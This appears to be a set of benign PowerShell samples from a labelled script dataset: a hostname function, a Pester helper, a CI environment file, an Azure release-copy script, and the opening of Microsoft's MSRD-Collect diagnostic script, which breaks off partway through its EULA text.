# .SYNOPSIS # Print the hostname of the system. # .DESCRIPTION # This function prints the hostname of the system. You can additionally output the DNS # domain or the FQDN by using the parameters as described below. # .PARAMETER Short # (Default) Print only the computername, i.e. the same value as returned by $env:computername # .PARAMETER Domain # If set, print only the DNS domain to which the system belongs. Overrides the Short parameter. # .PARAMETER FQDN # If set, print the fully-qualified domain name (FQDN) of the system. Overrides the Domain parameter. param ( [switch]$Short = $true, [switch]$Domain = $false, [switch]$FQDN = $false ) $ipProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties() if ( $FQDN ) { return "{0}.{1}" -f $ipProperties.HostName, $ipProperties.DomainName } if ( $Domain ) { return $ipProperties.DomainName } if ( $Short ) { return $ipProperties.HostName }
combined_dataset/train/non-malicious/3013.ps1
3013.ps1
function InModuleScope { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [string] $ModuleName, [Parameter(Mandatory = $true)] [scriptblock] $ScriptBlock ) if ($null -eq (& $SafeCommands['Get-Variable'] -Name Pester -ValueOnly -ErrorAction $script:IgnoreErrorPreference)) { $sessionState = Set-SessionStateHint -PassThru -Hint "Caller - Captured in InModuleScope" -SessionState $PSCmdlet.SessionState $Pester = New-PesterState -Path (& $SafeCommands['Resolve-Path'] .) -TestNameFilter $null -TagFilter @() -ExcludeTagFilter @() -SessionState $sessionState $script:mockTable = @{} } $module = Get-ScriptModule -ModuleName $ModuleName -ErrorAction Stop $originalState = $Pester.SessionState $originalScriptBlockScope = Get-ScriptBlockScope -ScriptBlock $ScriptBlock try { $sessionState = Set-SessionStateHint -PassThru -Hint "Module - $($module.Name)" -SessionState $module.SessionState $Pester.SessionState = $sessionState Set-ScriptBlockScope -ScriptBlock $ScriptBlock -SessionState $sessionState do { Write-ScriptBlockInvocationHint -Hint "InModuleScope" -ScriptBlock $ScriptBlock & $ScriptBlock } until ($true) } finally { $Pester.SessionState = $originalState Set-ScriptBlockScope -ScriptBlock $ScriptBlock -SessionStateInternal $originalScriptBlockScope } } function Get-ScriptModule { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [string] $ModuleName ) try { $modules = @(& $SafeCommands['Get-Module'] -Name $ModuleName -All -ErrorAction Stop) } catch { throw "No module named '$ModuleName' is currently loaded." } $scriptModules = @($modules | & $SafeCommands['Where-Object'] { $_.ModuleType -eq 'Script' }) if ($modules.Count -eq 0) { throw "No module named '$ModuleName' is currently loaded." } if ($scriptModules.Count -gt 1) { throw "Multiple Script modules named '$ModuleName' are currently loaded. Make sure to remove any extra copies of the module from your session before testing." } if ($scriptModules.Count -eq 0) { $actualTypes = @( $modules | & $SafeCommands['Where-Object'] { $_.ModuleType -ne 'Script' } | & $SafeCommands['Select-Object'] -ExpandProperty ModuleType -Unique ) $actualTypes = $actualTypes -join ', ' throw "Module '$ModuleName' is not a Script module. Detected modules of the following types: '$actualTypes'" } return $scriptModules[0] }
combined_dataset/train/non-malicious/sample_66_28.ps1
sample_66_28.ps1
# Copyright 2024 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Add required env vars here. required_envvars+=( ) # Add env vars which are passed down into the container here. pass_down_envvars+=( "NOX_SESSION" ############### # Docs builds ############### "STAGING_BUCKET" "V2_STAGING_BUCKET" ################## # Samples builds ################## "INSTALL_LIBRARY_FROM_SOURCE" "RUN_TESTS_SESSION" "BUILD_SPECIFIC_GCLOUD_PROJECT" # Target directories. "RUN_TESTS_DIRS" # The nox session to run. "RUN_TESTS_SESSION" ) # Prevent unintentional override on the default image. if [[ "${TRAMPOLINE_IMAGE_UPLOAD:-false}" == "true" ]] && \ [[ -z "${TRAMPOLINE_IMAGE:-}" ]]; then echo "Please set TRAMPOLINE_IMAGE if you want to upload the Docker image." exit 1 fi # Define the default value if it makes sense. if [[ -z "${TRAMPOLINE_IMAGE_UPLOAD:-}" ]]; then TRAMPOLINE_IMAGE_UPLOAD="" fi if [[ -z "${TRAMPOLINE_IMAGE:-}" ]]; then TRAMPOLINE_IMAGE="" fi if [[ -z "${TRAMPOLINE_DOCKERFILE:-}" ]]; then TRAMPOLINE_DOCKERFILE="" fi if [[ -z "${TRAMPOLINE_BUILD_FILE:-}" ]]; then TRAMPOLINE_BUILD_FILE="" fi
combined_dataset/train/non-malicious/3372.ps1
3372.ps1
[CmdletBinding()] Param( [Parameter(Mandatory=$True, Position=0)] [String]$PSVersion, [Parameter(Mandatory=$True, Position=1)] [String]$LastRelease, [Parameter(Mandatory=$True, Position=2)] [String]$CurrentRelease, [Parameter(Mandatory=$True, Position=3)] [String]$PathToShared, [Parameter(Mandatory=$True, Position=4)] [String]$PathToBuildArtifacts ) $PathToLastRelease = "$PathToShared\$($LastRelease)_PowerShell" $PathToCurrentRelease = "$PathToShared\$($CurrentRelease)_PowerShell" New-Item $PathToCurrentRelease -Type Directory > $null New-Item "$PathToCurrentRelease\pkgs" -Type Directory > $null Copy-Item "$PathToLastRelease\scripts" "$PathToCurrentRelease" -Recurse Copy-Item "$PathToLastRelease\removewebpiReg.reg" "$PathToCurrentRelease" Copy-Item "$PathToLastRelease\webpiReg.reg" "$PathToCurrentRelease" Copy-Item "$PathToLastRelease\wpilauncher.exe" "$PathToCurrentRelease" Copy-Item "$PathToBuildArtifacts\signed\AzurePowerShell.msi" "$PathToCurrentRelease" Copy-Item "$PathToBuildArtifacts\artifacts\*.nupkg" "$PathToCurrentRelease\pkgs" Rename-Item $PathToCurrentRelease\AzurePowerShell.msi azure-powershell.$PSVersion.msi (Get-Content $PathToCurrentRelease\webpiReg.reg) -replace $LastRelease, $CurrentRelease | Set-Content $PathToCurrentRelease\webpiReg.reg
combined_dataset/train/non-malicious/sample_0_85.ps1
sample_0_85.ps1
<# .SYNOPSIS Simplify data collection and diagnostics for troubleshooting Microsoft Remote Desktop (RDP/RDS/AVD/W365) related issues and a convenient method for submitting and following quick & easy action plans. .DESCRIPTION This script is designed to gather information to assist Microsoft Customer Support Services (CSS) in troubleshooting issues you may be experiencing with Microsoft Remote Desktop solutions. The collected data may contain Personally Identifiable Information (PII) and/or sensitive data, such as (but not limited to) IP addresses, PC names and user names. The script will save the collected data in a subfolder and compress the results into a ZIP file. Neither the folder nor the ZIP file are automatically sent to Microsoft. You can send the ZIP file to Microsoft CSS using a secure file transfer tool. Please discuss this with your support professional and address any concerns you may have. Find our privacy statement here: https://privacy.microsoft.com/en-US/privacystatement Run 'Get-Help .\MSRD-Collect.ps1 -Full' for more details. USAGE SUMMARY: Run the script on Windows source or target machines as required by the scenario you're investigating. The script has multiple module (.psm1) files located in a "Modules" folder. This folder, along with its underlying .psm1 files, must remain in the same folder as the main MSRD-Collect.ps1 file for the script to function correctly. Download the MSRD-Collect.zip package from the official public download location (https://aka.ms/MSRD-Collect) and extract all files from it, not just the MSRD-Collect.ps1. The script will import the necessary module(s) dynamically when specific data is being invoked. Manual import of the modules is not required. When launched without any command line parameters, the script will start in GUI mode where you can select one or more data collection or diagnostics scenarios. If you prefer to run the script without a GUI or to automate data collection/diagnostics, use command line parameters. Diagnostics will run regardless if other data collection scenarios have been selected. For more information see the MSRD-Collect-ReadMe.txt file. .NOTES Author : Robert Klemencz (Microsoft CSS) Requires : At least PowerShell version 5.1 and to be run elevated Version : See: $global:msrdVersion .LINK Download: https://aka.ms/MSRD-Collect Feedback: https://aka.ms/MSRD-Collect-Feedback .PARAMETER Machine Indicates the context/environment in which the machine is used. This is a mandatory parameter when not using the GUI. Based on the provided value, only data specific to that context/environment will be collected. Available values are: isAVD : Azure Virtual Desktop isRDS : Remote Desktop Services or direct (non-AVD/non-W365) RDP connection isW365 : Windows 365 Cloud PC .PARAMETER Role Indicates the role of the machine in the given context/environment. This is a mandatory parameter when not using the GUI. Based on the provided value, only data specific to that role will be collected. Available values are: isSource : Source machine from where you connect to other machines using a Remote Desktop client isTarget : Target machine to which you connect to or a server with any RDS role installed .PARAMETER Core Collect general data for troubleshooting AVD/RDS/W365 issues. Diagnostics will run at the end. .PARAMETER Profiles Collect Core + specific data for troubleshooting 'User Profiles' issues. Diagnostics will run at the end. .PARAMETER Activation Collect Core + specific data for troubleshooting 'OS Licensing/Activation' issues. Diagnostics will run at the end. .PARAMETER MSRA Collect Core + specific data for troubleshooting 'Remote Assistance/Quick Assist/Remote Help' issues. Diagnostics will run at the end. .PARAMETER SCard Collect Core + specific data for troubleshooting 'Smart Card' issues. Diagnostics will run at the end. .PARAMETER IME Collect Core + specific data for troubleshooting 'Input Method' issues. Diagnostics will run at the end. .PARAMETER Teams Collect Core + specific data for troubleshooting 'Teams Media Optimization' issues. Diagnostics will run at the end. (AVD/W365 only) .PARAMETER MSIXAA [Deprecated, use 'AppAttach' instead] Collect Core + specific data for troubleshooting 'App Attach' issues. Diagnostics will run at the end. (AVD ony) .PARAMETER AppAttach Collect Core + specific data for troubleshooting 'App Attach' issues. Diagnostics will run at the end. (AVD only) .PARAMETER HCI Collect Core + specific data for troubleshooting 'Azure Stack HCI' issues. Diagnostics will run at the end. (AVD only) .PARAMETER DumpPID Collect Core + a process dump based on the provided PID. Diagnostics will run at the end. .PARAMETER NetTrace Collect a network trace. .PARAMETER DiagOnly Skip collecting troubleshooting data (even if any other parameters are specificed) and only perform diagnostics. .PARAMETER AcceptEula Silently accept the Microsoft Diagnostic Tools End User License Agreement. .PARAMETER AcceptNotice Silently accept the Important Notice message displayed when the script is launched. .PARAMETER OutputDir ​​​​​​Specify an existing directory where to store the collected files. By default, the script will store the collected data under "C:\MS_DATA". .PARAMETER UserContext Specify the username in whose context some of the data (e.g. RDClientAutoTrace, Teams settings) will be collected. By default, the script will use the admin's username who launched it. .PARAMETER AzureEnv Override the value returned by the automatic Azure environment detection and use the specified Azure environment for performing Azure endpoint checks during data collection/diagnostics. Available values are: "All", "AzureChinaCloud", "AzureGermanCloud", "AzurePublicCloud", "AzureUSGovernmentCloud", "N/A". .PARAMETER SkipAutoUpdate Skip the automatic update check on launch for the current instance of the script (can be used for both GUI and command line mode). .PARAMETER LiteMode The script will open with a "Lite Mode" UI, regardless of the Config\MSRDC-Config.json settings. .PARAMETER AssistMode The script will read out loud some of the key information and steps performed during data collection/diagnostics. .PARAMETER SilentMode Verbose output (detailed steps or encountered errors) will not be displayed during data collection. .OUTPUTS By default, all collected data are stored in a subfolder under C:\MS_DATA. You can change this location by using the "-OutputDir" command line parameter or from the "Advanced Mode" UI. #> param ([ValidateSet('isAVD', 'isRDS', 'isW365')][string]$Machine, [ValidateSet('isSource', 'isTarget')][string]$Role, [switch]$Core, [switch]$Profiles, [switch]$Activation, [switch]$MSRA, [switch]$SCard, [switch]$IME, [switch]$Teams, [switch]$MSIXAA, [switch]$AppAttach, [switch]$HCI, [int]$DumpPID, [switch]$DiagOnly, [switch]$NetTrace, [switch]$AcceptEula, [switch]$AcceptNotice, [switch]$SkipAutoUpdate, [switch]$LiteMode, [switch]$AudioAssistMode, [switch]$SilentMode, [ValidateScript({ if (Test-Path $_ -PathType Container) { $true } else { throw "Invalid folder path. '$_' does not exist or is not a valid folder." } })][string]$OutputDir, [ValidateScript({ $profilePath = Join-Path (Split-Path $env:USERPROFILE) $_ if (Test-Path -Path $profilePath -PathType Container) { $true } else { throw "Invalid username. A local profile folder for user '$_' does not exist or could not be accessed." } })][string]$UserContext, [ValidateSet('All', 'AzureChinaCloud', 'AzureGermanCloud', 'AzurePublicCloud', 'AzureUSGovernmentCloud', 'N/A')][string]$AzureEnv) # Check if the current user is an administrator if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) { Write-Warning "This script needs to be run as Administrator" Exit 1 } # Check if the script is running in PowerShell ISE if ($host.Name -eq "Windows PowerShell ISE Host") { Write-Warning "Running MSRD-Collect in PowerShell ISE is not supported. Please run it from a regular elevated PowerShell console." Exit 1 } # Check PS Version If($PSVersionTable.PSVersion.Major -le 4) { Write-Warning "MSRD-Collect requires at least PowerShell version 5.1, but you are currently using PowerShell version $($PSVersionTable.PSVersion.Major).$($PSVersionTable.PSVersion.Minor).`nPlease update your PowerShell version to version 5.1 or higher!`nSee: https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-windows?view=powershell-5.1`n`n" Exit 1 } # Limiting scenarios for command line if (($Role -eq "isSource") -and ($Profiles -or $Activation -or $IME -or $AppAttach -or $HCI)) { Write-Warning "Machine role 'isSource' only supports the following scenarios: -Core, -MSRA, -SCard, -Teams, -DumpPID, -DiagOnly, -NetTrace. Adjust the command line and try again." Exit 1 } if ($Role -eq "isTarget") { if (($Machine -eq "isRDS") -and ($Teams -or $AppAttach -or $HCI)) { Write-Warning "Machine type 'isRDS' with machine role 'isTarget' only supports the following scenarios: -Core, -Profiles, -Activation, -MSRA, -SCard, -IME, -DumpPID, -DiagOnly, -NetTrace. Adjust the command line and try again." Exit 1 } elseif (($Machine -eq "isW365") -and ($AppAttach -or $HCI)) { Write-Warning "Machine type 'isW365' with machine role 'isTarget' only supports the following scenarios: -Core, -Profiles, -Activation, -MSRA, -SCard, -IME, -Teams, -DumpPID, -DiagOnly, -NetTrace. Adjust the command line and try again." Exit 1 } } if ($DiagOnly) { if ($Core -or $Profiles -or $Activation -or $AppAttach -or $MSRA -or $IME -or $HCI -or $Teams -or $SCard -or $NetTrace -or $DumpPID) { Write-Warning "Scenario 'DiagOnly' has been specified together with other scenarios. All scenarios will be ignored and only Diagnostics will run." } } # Deprecated / will be removed in a future version if ($MSIXAA) { Write-Warning "The command line parameter '-MSIXAA' is deprecated and has been replaced by '-AppAttach'. Run the script again using the '-AppAttach' command line parameter." Exit 1 } # Check if the required subfolders exist in the script folder if (-not (Test-Path -Path "$PSScriptRoot\Modules" -PathType Container)) { Write-Warning "The 'Modules' folder is missing from the script folder. Make sure that you have extracted all the files from the original ZIP archive and that you launch MSRD-Collect.ps1 from within the folder that contains all the extracted files and subfolders." Exit 1 } if (-not (Test-Path -Path "$PSScriptRoot\Config" -PathType Container)) { Write-Warning "The 'Config' folder is missing from the script folder. Make sure that you have extracted all the files from the original ZIP archive and that you launch MSRD-Collect.ps1 from within the folder that contains all the extracted files and subfolders." Exit 1 } if (-not (Test-Path -Path "$PSScriptRoot\Config\Localization" -PathType Container)) { Write-Warning "The 'Config\Localization' folder is missing from the script folder. Make sure that you have extracted all the files from the original ZIP archive and that you launch MSRD-Collect.ps1 from within the folder that contains all the extracted files and subfolders." Exit 1 } ### Global variables $global:msrdCollecting = $False $global:msrdConsoleColor = $host.ui.RawUI.ForegroundColor $global:msrdDiagnosing = $False $global:msrdFQDN = [System.Net.Dns]::GetHostByName($env:computerName).HostName $global:msrdGUI = $false $global:msrdLiveDiag = $false $global:msrdOSVer = (Get-CimInstance Win32_OperatingSystem).Caption $global:msrdProgress = 0 $global:msrdScriptpath = $PSScriptRoot $global:msrdTSSinUse = $MyInvocation.PSCommandPath -like "*TSS_UEX.psm1" $global:msrdVersion = "240927.0" $global:msrdVersioncheck = $false if ($PSSenderInfo) { $global:msrdCmdLine = "n/a" } else { $global:msrdCmdLine = $MyInvocation.Line } #for selfupdate restart #warn if outdated version $msrdcVer = $global:msrdVersion.SubString(0,6) $dateMSRDCver = [datetime]::ParseExact($msrdcVer, "yyMMdd", $null) $DiffDate = ((Get-Date) - $dateMSRDCver) If($DiffDate.Days -gt 90){ Write-Warning "This version of MSRD-Collect is over 90 days old. A newer version may be available. Use the script's AutoUpdate functionality or manually download the latest version from: https://aka.ms/MSRD-Collect" } if (-not $global:msrdTSSinUse) { #Unlock module files if valid $fileNamesToUnblock = @( "MSRDC-Activation.psm1", "MSRDC-Core.psm1", "MSRDC-Diagnostics.psm1", "MSRDC-FwFunctions.psm1", "MSRDC-FwGUI.psm1", "MSRDC-FwGUILite.psm1", "MSRDC-FwHtml.psm1", "MSRDC-HCI.psm1", "MSRDC-IME.psm1", "MSRDC-AppAttach.psm1", "MSRDC-MSRA.psm1", "MSRDC-Profiles.psm1", "MSRDC-SCard.psm1", "MSRDC-Teams.psm1", "MSRDC-Tracing.psm1", "MSRDC-WU.psm1" ) if (Test-Path -Path "$global:msrdScriptpath\Modules") { Get-ChildItem -Path $global:msrdScriptpath\Modules\MSRDC*.psm1 -Recurse | ForEach-Object { if ($_.Name -in $fileNamesToUnblock) { Try { Unblock-File $_.FullName -Confirm:$false -ErrorAction Stop } Catch { Write-Warning "Failed to unblock file: $($_.FullName) - $($_.Exception.Message)" } } } } else { Write-Warning "The 'Modules' folder is missing from the script folder. Make sure that you have extracted all the files from the original ZIP archive and that you launch MSRD-Collect.ps1 from within the folder that contains all the extracted files and subfolders." Exit 1 } } if ($global:msrdTSSinUse) { # Check if the included tools are available and valid $global:msrdToolsFolder = "$global:ScriptFolder\BIN" if (Test-Path -Path "$global:msrdToolsFolder\avdnettest.exe") { $global:avdnettestpath = "$global:msrdToolsFolder\avdnettest.exe" } else { $global:avdnettestpath = "" } if (Test-Path -Path "$global:msrdToolsFolder\procdump.exe") { $global:msrdProcDumpExe = "$global:msrdToolsFolder\procdump.exe" } else { $global:msrdProcDumpExe = "" } if (Test-Path -Path "$global:msrdToolsFolder\psping.exe") { $global:msrdPsPingExe = "$global:msrdToolsFolder\psping.exe" } else { $global:msrdPsPingExe = "" } } else { $global:msrdToolsFolder = "$global:msrdScriptpath\Tools" if (Test-Path -Path "$global:msrdToolsFolder\avdnettest.exe") { $global:avdnettestpath = "$global:msrdToolsFolder\avdnettest.exe" } else { $tssToolsFolder = $global:msrdScriptpath -ireplace [regex]::Escape("\scripts\MSRD-Collect"), "\BIN" if (Test-Path -Path "$tssToolsFolder\avdnettest.exe") { $global:msrdToolsFolder = "$tssToolsFolder\" $global:avdnettestpath = "$tssToolsFolder\avdnettest.exe" } else { $global:avdnettestpath = "" } } $global:msrdToolsFolder = "$global:msrdScriptpath\Tools" if (Test-Path -Path "$global:msrdToolsFolder\procdump.exe") { $global:msrdProcDumpExe = "$global:msrdToolsFolder\procdump.exe" } else { $tssToolsFolder = $global:msrdScriptpath -ireplace [regex]::Escape("\scripts\MSRD-Collect"), "\BIN" if (Test-Path -Path "$tssToolsFolder\procdump.exe") { $global:msrdToolsFolder = "$tssToolsFolder\" $global:msrdProcDumpExe = "$tssToolsFolder\procdump.exe" } else { $global:msrdProcDumpExe = "" } } $global:msrdToolsFolder = "$global:msrdScriptpath\Tools" if (Test-Path -Path "$global:msrdToolsFolder\psping.exe") { $global:msrdPsPingExe = "$global:msrdToolsFolder\psping.exe" } else { $tssToolsFolder = $global:msrdScriptpath -ireplace [regex]::Escape("\scripts\MSRD-Collect"), "\BIN" if (Test-Path -Path "$tssToolsFolder\psping.exe") { $global:msrdToolsFolder = "$tssToolsFolder\" $global:msrdPsPingExe = "$tssToolsFolder\psping.exe" } else { $global:msrdPsPingExe = "" } } } # Azure Environment if ($AzureEnv) { $global:msrdAzureEnv = $AzureEnv } # Read config file $global:msrdConfigFile = "$global:msrdScriptpath\Config\MSRDC-Config.json" if (Test-Path -Path $global:msrdConfigFile) { try { $global:msrdConfig = Get-Content $global:msrdConfigFile | ConvertFrom-Json } catch { Write-Warning "Could not read the Config\MSRDC-Config.json file. Make sure that the file exists and that it is not corrupted. Exiting." Exit 1 } } else { Write-Warning "Could not find the Config\MSRDC-Config.json file. Make sure that the file exists and that it is not corrupted. Exiting." Exit 1 } if ($global:msrdProcDumpExe -eq "") { $global:msrdProcDumpVer = "1.0" } else { if ($global:msrdConfig.ProcDumpVersion -match "\d{2}\.\d{1}$") { $global:msrdProcDumpVer = $global:msrdConfig.ProcDumpVersion } else { Write-Warning "Unsupported value found for 'ProcDumpVersion' in Config\MSRDC-Config.json. The value has to be of format XY.Z, where X, Y and Z are numbers (e.g. 11.0). Exiting." Exit 1 } } if ($global:msrdPsPingExe -eq "") { $global:msrdPsPingVer = "1.0" } else { if ($global:msrdConfig.PsPingVersion -match "\d{1}\.\d{2}$") { $global:msrdPsPingVer = $global:msrdConfig.PsPingVersion } else { Write-Warning "Unsupported value found for 'PsPingVersion' in Config\MSRDC-Config.json. The value has to be of format X.YZ, where X, Y and Z are numbers (e.g. 2.12). Exiting." Exit 1 } } if (@(0, 1) -notcontains $global:msrdConfig.ShowConsoleWindow) { Write-Warning "Missing or unsupported value for 'ShowConsoleWindow' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } if (@(0, 1) -notcontains $global:msrdConfig.MaximizeWindow) { Write-Warning "Missing or unsupported value for 'MaximizeWindow' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } if (@("Prod","Insider") -notcontains $global:msrdConfig.DevLevel) { Write-Warning "Missing or unsupported value for 'DevLevel' in Config\MSRDC-Config.json. Supported values are Prod or Insider. Exiting." Exit 1 } if (@("AR","CN","CS","DE","EN","ES","FR","HI","HU","NL","IT","JP","PT","RO","TR") -contains $global:msrdConfig.UILanguage) { $global:msrdLangID = $global:msrdConfig.UILanguage } else { Write-Warning "Unsupported value found for 'UILanguage' in Config\MSRDC-Config.json. Supported values are AR, CN, CS, DE, EN, ES, FR, HI, HU, NL, IT, JP, PT, RO or TR. Exiting." Exit 1 } if (@(0, 1) -notcontains $global:msrdConfig.PlaySounds) { Write-Warning "Missing or unsupported value for 'PlaySounds' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } if (@(10, 12, 14, 16) -contains $global:msrdConfig.PsBoxFont) { $global:msrdPsBoxFont = $global:msrdConfig.PsBoxFont } else { Write-Warning "Unsupported value found for 'PsBoxFont' in Config\MSRDC-Config.json. Supported values are 10, 12, 14 or 16. Exiting." Exit 1 } if (-not $global:msrdTSSinUse) { if ($LiteMode) { $msrdGUILite = 1 } else { if (@(0, 1) -contains $global:msrdConfig.UILiteMode) { $msrdGUILite = $global:msrdConfig.UILiteMode } else { Write-Warning "Unsupported value found for 'UILiteMode' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } } if ($AudioAssistMode) { $global:msrdAudioAssistMode = 1 } else { if (@(0, 1) -contains $global:msrdConfig.AudioAssistMode) { $global:msrdAudioAssistMode = $global:msrdConfig.AudioAssistMode } else { Write-Warning "Unsupported value found for 'AudioAssistMode' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } } } # Silent mode init if (-not $global:msrdTSSinUse) { if ($global:msrdAudioAssistMode -eq 1) { $global:msrdSilentMode = 0 } else { if ($SilentMode) { $global:msrdSilentMode = 1 } else { if (@(0, 1) -contains $global:msrdConfig.SilentMode) { $global:msrdSilentMode = $global:msrdConfig.SilentMode } else { Write-Warning "Unsupported value found for 'SilentMode' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } } } } # Check if auto update check should be performed if ($SkipAutoUpdate) { $global:msrdConfig.AutomaticVersionCheck = 0 "SkipAutoUpdate switch specified, automatic update check on script launch will be skipped" } else { if (@(0, 1) -notcontains $global:msrdConfig.AutomaticVersionCheck) { Write-Warning "Missing or unsupported value for 'AutomaticVersionCheck' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } if (@(0, 1) -notcontains $global:msrdConfig.ScriptSelfUpdate) { Write-Warning "Missing or unsupported value for 'ScriptSelfUpdate' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } } function msrdVerifyToolsSignature { Param ($filepath) try { $signature = Get-AuthenticodeSignature -FilePath $filepath -ErrorAction SilentlyContinue $cert = $signature.SignerCertificate $issuer = $cert.Issuer if ($signature.Status -ne "Valid") { Write-Warning "'$filepath' does not have a valid signature. Stopping script execution. Make sure you download and unpack the full package of MSRD-Collect or TSS only from the official download locations." Exit 1 } if (($issuer -ne "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US") -and ($issuer -ne "CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US") -and ($issuer -ne "CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US") -and ($issuer -ne "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US") -and ($issuer -ne "CN=Microsoft Development PCA 2014, O=Microsoft Corporation, L=Redmond, S=Washington, C=US")) { Write-Warning "'$filepath' does not have a valid signature. Stopping script execution. Make sure you download and unpack the full package of MSRD-Collect or TSS only from the official download locations." Exit 1 } } catch { Write-Warning "Failed to verify the signature of '$filepath'. Reason: $($_.Exception.Message)`nStopping script execution. Make sure you download and unpack the full package of MSRD-Collect or TSS only from the official download locations." Exit 1 } } # Localization init $localizationFilePath = Join-Path $global:msrdScriptpath "Config\Localization\MSRDC-Fw$($global:msrdLangID).xml" if (Test-Path -Path $localizationFilePath) { try { [xml] $global:msrdLangText = Get-Content -Path $localizationFilePath -Encoding UTF8 -ErrorAction Stop # Create a hashtable to store the mappings $global:msrdTextHashtable = @{} # Populate the hashtable foreach ($langNode in $global:msrdLangText.LangV1.lang) { $textID = $langNode.id $message = $langNode."#text" if ($message -like "*&amp;*") { $message = $message.replace("&amp;", "&") } $global:msrdTextHashtable[$textID] = $message } } catch { Write-Warning "Could not read the Config\Localization\MSRDC-Fw$($global:msrdLangID).xml file: $_. Make sure that the file exists and that it is not corrupted." Exit 1 } } else { Write-Warning "Could not find the Config\Localization\MSRDC-Fw$($global:msrdLangID).xml file. Make sure that the file exists and that it is not corrupted." Exit 1 } # Output folder init If ($OutputDir) { $global:msrdLogRoot = $OutputDir } else { if ($global:msrdTSSinUse) { $global:msrdLogRoot = $global:LogFolder } else { $global:msrdLogRoot = "C:\MS_DATA" } } # User context init if ($UserContext) { $global:msrdUserprof = $UserContext } else { $global:msrdUserprof = $env:USERNAME } [void][System.Reflection.Assembly]::Load('System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a') [void][System.Reflection.Assembly]::Load('System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089') # Main functions init Import-Module -Name "$PSScriptRoot\Modules\MSRDC-FwFunctions" -DisableNameChecking -Force -Scope Global if (@(0, 1) -notcontains $global:msrdConfig.IsRestarting) { Write-Warning "Missing or unsupported value for 'IsRestarting' in Config\MSRDC-Config.json. Supported values are 0 or 1. Exiting." Exit 1 } if ($global:msrdConfig.IsRestarting -eq 1) { msrdUpdateConfigFile -configFile "Config\MSRDC-Config.json" -key "IsRestarting" -value 0 } else { if ($global:avdnettestpath -ne "") { msrdVerifyToolsSignature $global:avdnettestpath } if ($global:msrdProcDumpExe -ne "") { msrdVerifyToolsSignature $global:msrdProcDumpExe } if ($global:msrdPsPingExe -ne "") { msrdVerifyToolsSignature $global:msrdPsPingExe } } # Check if the current account is domain vs local account try { # Get the current user's SID $userSID = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value # Get the list of local users' SIDs $localUserSIDs = Get-CimInstance -ClassName Win32_UserAccount -Filter "LocalAccount=True" | Select-Object -ExpandProperty SID # Check if the user's SID matches any of the local user SIDs $isLocalUser = $localUserSIDs -contains $userSID if ($isLocalUser) { $global:msrdAccountLevel = "Local Account" Write-Warning "$(msrdGetLocalizedText "localAdminStart")`n" } else { $global:msrdAccountLevel = "Domain Account" } } catch { $global:msrdAccountLevel = "Local Account" Write-Warning "Failed to determine account type: $($_.Exception.InnerException.Message)Defaulting to 'Local Account'. If you need to collect Domain related information, make sure that the user running the script is a Domain User with Admin rights." } # EULA function msrdShowEULAPopup($mode) { $EULA = New-Object -TypeName System.Windows.Forms.Form $richTextBox1 = New-Object System.Windows.Forms.RichTextBox $btnAcknowledge = New-Object System.Windows.Forms.Button $btnCancel = New-Object System.Windows.Forms.Button $EULA.SuspendLayout() $EULA.Name = "EULA" $EULA.Text = "Microsoft Diagnostic Tools End User License Agreement" $richTextBox1.Anchor = [System.Windows.Forms.AnchorStyles]::Top -bor [System.Windows.Forms.AnchorStyles]::Bottom -bor [System.Windows.Forms.AnchorStyles]::Left -bor [System.Windows.Forms.AnchorStyles]::Right $richTextBox1.Location = New-Object System.Drawing.Point(12,12) $richTextBox1.Name = "richTextBox1" $richTextBox1.ScrollBars = [System.Windows.Forms.RichTextBoxScrollBars]::Vertical $richTextBox1.Size = New-Object System.Drawing.Size(776, 397) $richTextBox1.TabIndex = 0 $richTextBox1.ReadOnly=$True $richTextBox1.Add_LinkClicked({Start-Process -FilePath $_.LinkText}) $richTextBox1.Rtf = @" {\rtf1\ansi\ansicpg1252\deff0\nouicompat{\fonttbl{\f0\fswiss\fprq2\fcharset0 Segoe UI;}{\f1\fnil\fcharset0 Calibri;}{\f2\fnil\fcharset0 Microsoft Sans Serif;}} {\colortbl ;\red0\green0\blue255;} {\*\generator Riched20 10.0.19041}{\*\mmathPr\mdispDef1\mwrapIndent1440 }\viewkind4\uc1 \pard\widctlpar\f0\fs19\lang1033 MICROSOFT SOFTWARE LICENSE TERMS\par Microsoft Diagnostic Scripts and Utilities\par \par {\pict{\*\picprop}\wmetafile8\picw26\pich26\picwgoal32000\pichgoal15 0100090000035000000000002700000000000400000003010800050000000b0200000000050000 000c0202000200030000001e000400000007010400040000000701040027000000410b2000cc00 010001000000000001000100000000002800000001000000010000000100010000000000000000 000000000000000000000000000000000000000000ffffff00000000ff040000002701ffff0300 00000000 }These license terms are an agreement between you and Microsoft Corporation (or one of its affiliates). IF YOU COMPLY WITH THESE LICENSE TERMS, YOU 